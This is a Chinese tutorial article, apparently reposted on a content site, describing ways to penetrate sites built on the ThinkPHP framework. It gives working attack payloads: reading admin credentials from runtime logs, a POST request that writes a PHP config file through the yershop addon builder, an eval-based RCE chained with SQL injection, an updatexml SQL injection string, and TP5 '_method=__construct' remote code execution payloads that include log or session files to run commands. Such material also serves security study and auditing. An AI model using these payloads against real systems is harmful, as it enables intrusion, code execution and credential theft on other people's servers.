ThinkPHP的一些渗透方式

下面由thinkphp框架教程栏目给大家介绍thinkphp的一些渗透方式,希望对需要的朋友有所帮助!

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,可以支持Windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展。 

Runtime日志

在ThinkPHP3的版本中,入口文件index.php是跟应用目录、框架目录在同一个目录下的,在DEBUG开启的状态下,会在runtime生成日志文件,泄露一些管理员登录后台的账号密码等。tp3的日志文件命名规则为:根目录(或者应用目录)/Runtime/Logs/Admin/20_08_17.log(年份前2位_月份_日.log)

ThinkPHP的一些渗透方式

 

在tp5的版本中,入口文件index是在public的目录下,它跟应用目录、框架目录不在同一个目录,但是有些管理员会将入口文件放置到跟应用目录、框架目录同目录,tp5的命名规则为:

立即学习“PHP免费学习笔记(深入)”;

./runtime/log/202008/17.log(./runtime/log/年月/日.log)

ThinkPHP的一些渗透方式

 

file_put_contents函数

在ThinkPHP3中,后台有时会写入配置文件来getshell的,所以我倾向全局查找这个file_put_contents函数,然后在网上找个代码–yershop(TP3开发的那个版本)来进行审计,后台可以通过写入文件来拿shell。全局查找file_put_contents函数,发现控制器AddonsController.class.php中的build存在。

ThinkPHP的一些渗透方式

 

发现存在两处写入文件,这里第一处需要满足以下条件:

$addon_dir可控,$data可控,$addonModel可控

第二处需要满足:

$data['has_config'] == 1,$addon_dir可控

跟踪发现$data是从全局POST获取的,所有可控,即$addon_dir可控。

ThinkPHP的一些渗透方式

 

构造payload如下,后台创建扩展。

ThinkPHP的一些渗透方式

 

点击确定,抓包,首先会判断标识名这个插件是否存在,不存在就执行build访问。

ThinkPHP的一些渗透方式

 

由于要写入config.php这个文件需要满足$data[‘has_config’] == 1,最后构造payload。

访问:index.php?s=/Admin/Addons/build.html

POST发送:

info%5Bname%5D=Example&info%5Btitle%5D=%E7%A4%BA%E5%88%97&info%5Bversion%5D=0.1&info%5Bauthor%5D=%E6%97%A0%E5%90%8D&info%5Bdescription%5D=%E8%BF%99%E6%98%AF%E4%B8%80%E4%B8%AA%E4%B8%B4%E6%97%B6%E6%8F%8F%E8%BF%B0&info%5Bstatus%5D=1&config=%3C%3Fphp%0D%0Areturn+array(%0D%0A%09'random'%3D%3Earray(%2F%2F%E9%85%8D%E7%BD%AE%E5%9C%A8%E8%A1%A8%E5%8D%95%E4%B8%AD%E7%9A%84%E9%94%AE%E5%90%8D+%2C%E8%BF%99%E4%B8%AA%E4%BC%9A%E6%98%AFconfig%5Brandom%5D%0D%0A%09%09'title'%3D%3E'%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AF%E9%9A%8F%E6%9C%BA%3A'%2C%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E6%96%87%E5%AD%97%0D%0A%09%09'type'%3D%3E'radio'%2C%09%09+%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E7%B1%BB%E5%9E%8B%EF%BC%9Atext%E3%80%81textarea%E3%80%81checkbox%E3%80%81radio%E3%80%81select%E7%AD%89%0D%0A%09%09'options'%3D%3Earray(%09%09+%2F%2Fselect+%E5%92%8Cradion%E3%80%81checkbox%E7%9A%84%E5%AD%90%E9%80%89%E9%A1%B9%0D%0A%09%09%09'1'%3D%3E'%E5%BC%80%E5%90%AF'%2C%09%09+%2F%2F%E5%80%BC%3D%3E%E6%96%87%E5%AD%97%0D%0A%09%09%09'0'%3D%3E'%E5%85%B3%E9%97%AD'%2C%0D%0A%09%09)%2C%0D%0A%09%09'value'%3D%3E'1'%2C%09%09%09+%2F%2F%E8%A1%A8%E5%8D%95%E7%9A%84%E9%BB%98%E8%AE%A4%E5%80%BC%0D%0A%09)%2C%0D%0A)%3B%0D%0A%09%09%09%09%09&custom_config=&admin_list='model'%3D%3E'Example'%2C%09%09%2F%2F%E8%A6%81%E6%9F%A5%E7%9A%84%E8%A1%A8%0D%0A%09%09%09'fields'%3D%3E'*'%2C%09%09%09%2F%2F%E8%A6%81%E6%9F%A5%E7%9A%84%E5%AD%97%E6%AE%B5%0D%0A%09%09%09'map'%3D%3E''%2C%09%09%09%09%2F%2F%E6%9F%A5%E8%AF%A2%E6%9D%A1%E4%BB%B6%2C+%E5%A6%82%E6%9E%9C%E9%9C%80%E8%A6%81%E5%8F%AF%E4%BB%A5%E5%86%8D%E6%8F%92%E4%BB%B6%E7%B1%BB%E7%9A%84%E6%9E%84%E9%80%A0%E6%96%B9%E6%B3%95%E9%87%8C%E5%8A%A8%E6%80%81%E9%87%8D%E7%BD%AE%E8%BF%99%E4%B8%AA%E5%B1%9E%E6%80%A7%0D%0A%09%09%09'order'%3D%3E'id+desc'%2C%09%09%2F%2F%E6%8E%92%E5%BA%8F%2C%0D%0A%09%09%09'list_grid'%3D%3Earray(+%09%09%2F%2F%E8%BF%99%E9%87%8C%E5%AE%9A%E4%B9%89%E7%9A%84%E6%98%AF%E9%99%A4%E4%BA%86id%E5%BA%8F%E5%8F%B7%E5%A4%96%E7%9A%84%E8%A1%A8%E6%A0%BC%E9%87%8C%E5%AD%97%E6%AE%B5%E6%98%BE%E7%A4%BA%E7%9A%84%E8%A1%A8%E5%A4%B4%E5%90%8D%E5%92%8C%E6%A8%A1%E5%9E%8B%E4%B8%80%E6%A0%B7%E6%94%AF%E6%8C%81%E5%87%BD%E6%95%B0%E5%92%8C%E9%93%BE%E6%8E%A5%0D%0A++++++++++++++++'cover_id%7Cpreview_pic%3A%E5%B0%81%E9%9D%A2'%2C%0D%0A++++++++++++++++'title%3A%E4%B9%A6%E5%90%8D'%2C%0D%0A++++++++++++++++'description%3A%E6%8F%8F%E8%BF%B0'%2C%0D%0A++++++++++++++++'link_id%7Cget_link%3A%E5%A4%96%E9%93%BE'%2C%0D%0A++++++++++++++++'update_time%7Ctime_format%3A%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4'%2C%0D%0A++++++++++++++++'id%3A%E6%93%8D%E4%BD%9C%3A%5BEDIT%5D%7C%E7%BC%96%E8%BE%91%2C%5BDELETE%5D%7C%E5%88%A0%E9%99%A4'%0D%0A++++++++++++)%2C%0D%0A%09%09%09%09%09&custom_adminlist=&has_config=1&config=

成功写入config.php文件,访问Addons/Example/config.php。

ThinkPHP的一些渗透方式

 

所以,在tp3开发的源码中,全局查找file_put_contents很容易中奖。

Auth引发的RCE

在tp3中,在Auth的getAuthList方法存在eval函数,跟进代码

ThinkPHPLibraryThinkAuth.class.php。

ThinkPHP的一些渗透方式

 

这里需要满足$command变量可控就可以rce了,$command为[表前缀]_auth_rule的condition字段,还是以yershop源码来分析,控制权限的表为yershop_auth_rule。

ThinkPHP的一些渗透方式

 

所以,漏洞触发需要向condition字段写入恶意代码,要利用注入且支持pdo就能写入进去,tp3是以pdo来连接数据库的,这里满足了pdo,就需要寻找注入点来getshell了。

在文件ApplicationHomeControllerOrderController.class.php中的detail方法,通过I方法获取id参数。

ThinkPHP的一些渗透方式

 

利用pdo修改condition字段

ThinkPHP的一些渗透方式

 

继续分析,怎么调用到getAuthList这个方法的,在ApplicationAdminControllerAdminController.class.php控制器中,调用了checkRule方法,在checkRule方法实列了Auth类,并调用了check方法。

ThinkPHP的一些渗透方式

 

跟进check方法:

ThinkPHP的一些渗透方式

 

在104行调用了我们的getAuthList方法,执行到了eval函数处。要触发rce,从代码中可以看到需要普通用户的权限才会执行到checkRule方法,所以先添加一个新用户并新增一个用户组,给文章管理的权限。

ThinkPHP的一些渗透方式

 

登录这个用户,访问注入修改的路由,成功rce。

ThinkPHP的一些渗透方式

 

SQL注入

在TP3.1.3和TP3.2.3注入都差不多,无非就表达式注入,bind注入,find/select/delete注入,order注入,在之前的文章中,分析过关于tp3.2.3的注入,这里主要是TP5的注入。

ThinkPHP<=5.0.16 insert/update注入

在ThinkPHP5中,获取请求方式的方法是input,在控制器中,写个存在漏洞的demo:

public function getuser(){        $username = input('get.username/a');        $user = db('user')->where(['uid'=>1])->update(['username'=>$username]);        dump($user);    }

漏洞payload:

username[0]=dec&username[1]=updatexml(1,concat(0x7e,user(),0x7e),1)&username[2]=1

ThinkPHP的一些渗透方式

 

在user变量处,断点进行分析,直接进入update方法。

ThinkPHP的一些渗透方式

 

继续跟进$this->builder->update

ThinkPHP的一些渗透方式

 

在parseData方法中,进行了sql语句的拼接。

ThinkPHP的一些渗透方式

 

当参数传入数组的时候,下标0为exp时候,直接返回下标为1的参数值,而为inc或者dec时候,通过parseKey方法处理了下标为1的参数值,跟进查看parseKey方法:

protected function parseKey($key, $options = [])    {        $key = trim($key);        if (strpos($key, '$.') && false === strpos($key, '(')) {            // JSON字段支持            list($field, $name) = explode('$.', $key);            $key                = 'json_extract(' . $field . ', '$.' . $name . '')';        } elseif (strpos($key, '.') && !preg_match('/[,'"()`s]/', $key)) {            list($table, $key) = explode('.', $key, 2);            if ('__TABLE__' == $table) {                $table = $this->query->getTable();            }            if (isset($options['alias'][$table])) {                $table = $options['alias'][$table];            }        }        if (!preg_match('/[,'"*()`.s]/', $key)) {            $key = '`' . $key . '`';        }        if (isset($table)) {            if (strpos($table, '.')) {                $table = str_replace('.', '`.`', $table);            }            $key = '`' . $table . '`.' . $key;        }        return $key;    }

然而parseKey并没有对传入的字符进行任何过滤,所以当输入exp,inc,dec,都返回的字符串,为什么参数值为exp的时候不能产生注入,原因是在用input方法传入的时候,要经过filterExp进行过滤。

public function filterExp(&$value)    {        // 过滤查询特殊字符        if (is_string($value) && preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT LIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i', $value)) {            $value .= ' ';        }        // TODO 其他安全过滤    }

当匹配到exp的时候,就会在exp后面添加一个空格,导致不能同parseKey方法中的exp相等。同样,利用insert方法向数据库插入数据也是同种原理。由于篇幅问题,网上的分析文章也多,之后的注入不想再造轮子了,可以详细看这个师傅的文章:https://github.com/Mochazz/ThinkPHP-Vuln

TP5 rce漏洞

TP5的rce漏洞影响版本:ThinkPHP 5.0.x ~ 5.0.23、ThinkPHP 5.1.x ~ 5.1.31、ThinkPHP 5.2.0beta1

TP5rce的分析网上也比较多了,这里主要说下在TP渗透,php7版本的关于log文件和session文件包含的问题。

runtime文件包含拿shell

先写入一句话到runtime日志中,POST发送。

_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=

runtime的日志文件为./runtime/log/202008/17.log

_method=__construct&method=get&filter[]=think__include_file&server[]=phpinfo&get[]=../runtime/log/202008/17.log&cmd=phpinfo();

ThinkPHP的一些渗透方式

 

session文件包含拿shell

写入session文件

_method=__construct&filter[]=thinkSession::set&method=get&get[]=&server[]=1

一般linux下的session文件存储在/var/lib/php/session,session的命名为sess_[PHPSESSID]。

_method=__construct&method=get&filter[]=think__include_file&get[]=/var/lib/php/session/sess_sf9vlodcl4j4r1bhli2ddnvr32&server[]=1&cmd=phpinfo();

ThinkPHP的一些渗透方式

 

其实也可以用反序列化的点来,只是有点麻烦,需要去调代码。

_method=__construct&filter=unserialize&method=get&server[REQUEST_METHOD]=序列化

反序列化

反序列化点通常都是在代码审计当中被发现的,当unserialize可控时可以触发,但是只光靠unserialize可控很难找到可控点,这时安全研究员Sam Thomas分享了一个关于phar反序列的漏洞,大大增加了反序列化的利用点。由于TP5-6的反序列化分析篇幅比较大,可以直接看下面文章进行深度学习:

Thinkphp5.0.24反序列:https://jfanx1ng.github.io/2020/05/07/ThinkPHP5.0.24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

Thinkphp5.1.x反序列:https://jfanx1ng.github.io/2020/05/09/ThinkPHP5.1.x%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE%E5%88%86%E6%9E%90/
Thinkphp6.x反序列:https://jfanx1ng.github.io/2020/05/13/ThinkPHP6.0%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90

phar反序列化挖掘案列:https://bbs.ichunqiu.com/thread-57947-1-1.html

今天的文章分享,小伙伴们看懂了吗?

以上就是ThinkPHP的一些渗透方式的详细内容,更多请关注创想鸟其它相关文章!

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/80620.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2025年11月15日 16:30:43
下一篇 2025年11月15日 17:44:59

相关推荐

  • Go database/sql 包:如何查询并打印多字段结果

    本文详细介绍了在go语言中使用`database/sql`包和`go-sql-driver/mysql`驱动时,如何从数据库查询中获取并打印多个字段。通过修改sql查询语句以选择所需列,并调整`rows.scan`方法以正确绑定多列数据到相应的go变量,文章演示了实现灵活数据检索和展示的关键步骤,并…

    好文分享 2025年12月16日
    000
  • 使用 Go 处理包含非 JSON 内容的 JSON 流

    本文介绍了如何使用 Go 语言处理从标准输入读取的 JSON 数据流,该数据流中 JSON 结构体之间穿插着非 JSON 字符串(例如 “end”)。我们将探讨如何读取数据流,过滤掉非 JSON 内容,并将有效的 JSON 数据反序列化为 Go 结构体。 处理混合 JSON …

    2025年12月16日
    000
  • 如何在Golang中处理表单多字段验证

    答案:在Golang中处理表单多字段验证需结合结构体绑定与错误反馈,可使用%ignore_a_1%手动验证或第三方库如go-playground/validator提升效率。通过ParseForm解析数据并映射到结构体,手动检查字段有效性,适用于简单场景;对于复杂项目,推荐使用validator库,…

    2025年12月16日
    000
  • Go HTTP Server 中处理带有 Body 的 GET 请求

    本文介绍了在 Go HTTP 服务器中处理带有 body 的 GET 请求的方法。虽然 HTTP 规范不建议在 GET 请求中使用 body,但在某些特殊情况下可能需要处理此类请求。本文将探讨如何通过检查 Content-Length 头部或劫持连接来读取 GET 请求的 body,并提供修改标准库…

    2025年12月16日
    000
  • 深入理解Go语言HTTP服务器的并发处理机制

    go语言的`net/http`包构建的http服务器天生支持并发,每个传入请求都会在一个独立的goroutine中处理,从而避免阻塞。然而,用户在测试时可能会因浏览器自身的并发连接限制而产生服务器阻塞的错觉。本文将深入探讨go http服务器的并发原理,并通过示例代码和测试方法,帮助开发者正确理解并…

    2025年12月16日
    000
  • Go HTTP Handler 依赖注入:使用闭包优雅地传递类型

    本教程探讨了在go语言http服务中,如何将数据库连接等自定义类型或依赖项安全有效地传递给http处理函数。通过引入闭包(closure)的概念,我们能够避免使用全局变量,实现更清晰、可测试且易于维护的架构设计,确保每个请求处理都能访问到必要的资源。 在构建Go语言的Web应用程序时,HTTP处理函…

    2025年12月16日
    000
  • Go 包初始化机制详解

    go语言中,包的初始化是一个严格且有序的过程。无论一个包被程序中的多少个文件或多少个其他包导入,它都只会初始化一次。初始化流程包括按依赖顺序处理包级变量和常量,然后执行所有`init()`函数。这一机制确保了程序状态的确定性,并避免了重复初始化带来的潜在问题。 Go语言的包初始化机制是其程序执行模型…

    2025年12月16日
    000
  • 处理Go JSON流中的非JSON内容:一种实用教程

    本文针对Go语言处理JSON流时遇到的非JSON内容干扰问题,提供了一种有效的解决方案。通过读取字节切片、裁剪非JSON字符串,并使用JSON Unmarshaller进行解析,实现了在混合数据流中提取和处理JSON数据的能力。本教程将详细介绍该方法的实现步骤和代码示例,帮助开发者解决类似问题。 在…

    2025年12月16日
    000
  • Golang如何使用reflect获取变量类型

    答案:在Golang中,使用reflect.TypeOf可获取变量的类型信息,返回reflect.Type对象,通过Name()获取类型名,Kind()获取底层种类,支持指针、结构体等复杂类型的类型解析。 在Golang中,可以通过reflect包来获取变量的类型信息。核心是使用reflect.Ty…

    2025年12月16日
    000
  • 使用 gofmt 快速检查 Go 语言代码语法

    本文详细介绍了如何在go语言中仅检查源代码的语法错误,而无需进行完整的项目构建。核心方法是利用 `gofmt` 工具及其 `-e` 选项,它能有效报告文件中的所有语法问题。通过命令行示例和对 `gofmt` 选项的解析,教程展示了如何高效地进行语法验证,并探讨了如何利用其退出码在自动化流程中判断检查…

    2025年12月16日
    000
  • Go语言中实现有序Map迭代的策略与实践

    go语言内置的`map`类型不保证迭代顺序,如果需要按特定键序遍历,直接使用`map`会导致非确定性结果。本文将探讨go中实现有序map迭代的挑战,并介绍一种更符合go惯例的解决方案:选择使用b树或其他有序数据结构库,而非通过频繁地将`map`转换为排序切片。 理解Go语言Map的迭代顺序 Go语言…

    2025年12月16日
    000
  • Go语言中值转换为Go语法字面量表示的实践指南

    本文详细阐述了在go语言中,如何将各种数据类型(如字符串、整数、浮点数、复数乃至结构体)转换为其对应的go语法字面量表示。通过深入解析`fmt.sprintf`函数及其关键的`%#v`格式化动词,我们提供了清晰的代码示例和专业指导,帮助开发者在动态代码生成、调试输出或构建抽象语法树(ast)时,高效…

    2025年12月16日
    000
  • Go语言中如何获取变量的类型字符串

    在go语言中,获取变量的类型字符串是常见的需求,尤其对于熟悉其他语言(如javascript的typeof或python的type)的开发者而言。go没有内置的typeof操作符,但提供了两种主要方式:使用fmt.printf的%t格式化动词可以直接打印变量类型;若需将类型作为字符串值进行进一步处理…

    2025年12月16日
    000
  • Go语言中创建HTML表单模板的实践指南

    分别创建了用户名字段和密码字段。name属性对于表单提交至关重要,它定义了字段的键名。 创建了一个提交按钮。 解析与准备模板 定义了HTML字符串后,我们需要使用html/template包将其解析成可执行的模板对象。template.New()用于创建一个新的模板实例,Parse()方法则负责解析…

    2025年12月16日
    000
  • 如何在Golang中实现异步任务提升效率

    合理使用goroutine和channel可提升Go程序效率,通过go关键字启动异步任务,利用channel进行通信与同步,结合context实现超时控制与任务取消,配合WaitGroup协调批量任务完成,避免资源泄漏,从而高效利用多核资源。 在Golang中提升效率的关键方式之一就是合理使用异步任…

    2025年12月16日
    000
  • Go语言Unix域Socket Echo服务器实现与常见问题解析

    本文深入探讨了go语言中unix域socket echo服务器的实现细节,重点分析了`net.conn.read`操作中常见的缓冲区分配问题、`io.eof`的正确处理方式,以及`sync.waitgroup`在并发编程中作为参数传递时的注意事项。通过一个实际的示例代码,文章展示了如何构建一个健壮、…

    2025年12月16日
    000
  • 使用IntelliJ IDEA高效开发Go语言并实现自动化部署

    本文将指导您如何利用intellij idea及其go插件构建一个高效的go语言开发环境,并详细介绍如何配置ide以实现类似pycharm的自动化文件上传和部署功能,从而简化开发流程,提升部署效率。 在现代软件开发中,一个功能强大且集成度高的集成开发环境(IDE)对于提升开发效率至关重要。对于Go语…

    2025年12月16日
    000
  • Go语言中实现栈(LIFO)行为:通道的局限性与替代方案

    go语言的通道(channels)天生具备先进先出(fifo)的队列特性,无法直接配置为后进先出(lifo)的栈。当需要实现lifo行为,例如在深度优先搜索(dfs)中优化内存时,开发者应考虑使用go内置的切片(slice)来构建自定义栈,这是最直接且高效的解决方案。在某些特定场景下,`contai…

    2025年12月16日
    000
  • 构建健壮的Go语言Socket Echo服务器:核心实践与常见陷阱解析

    本文详细指导如何使用go语言构建一个功能完备的socket echo服务器。我们将深入探讨`net.conn.read`方法的正确使用姿态,包括缓冲区管理和`io.eof`处理,并纠正`sync.waitgroup`在并发编程中的常见错误,确保服务器能够稳定、高效地响应客户端请求。 引言:Go语言与…

    2025年12月16日
    000
  • Go语言:如何以字符串形式获取变量类型

    在go语言中,获取变量的类型字符串是常见的需求。本文将详细介绍两种主要方法:一是利用`fmt.printf`函数的`%t`格式化动词直接打印变量类型,二是使用`reflect`包的`reflect.typeof().string()`方法获取类型字符串供程序进一步处理。通过实用示例和注意事项,帮助开…

    2025年12月16日
    000

发表回复

登录后才能评论
关注微信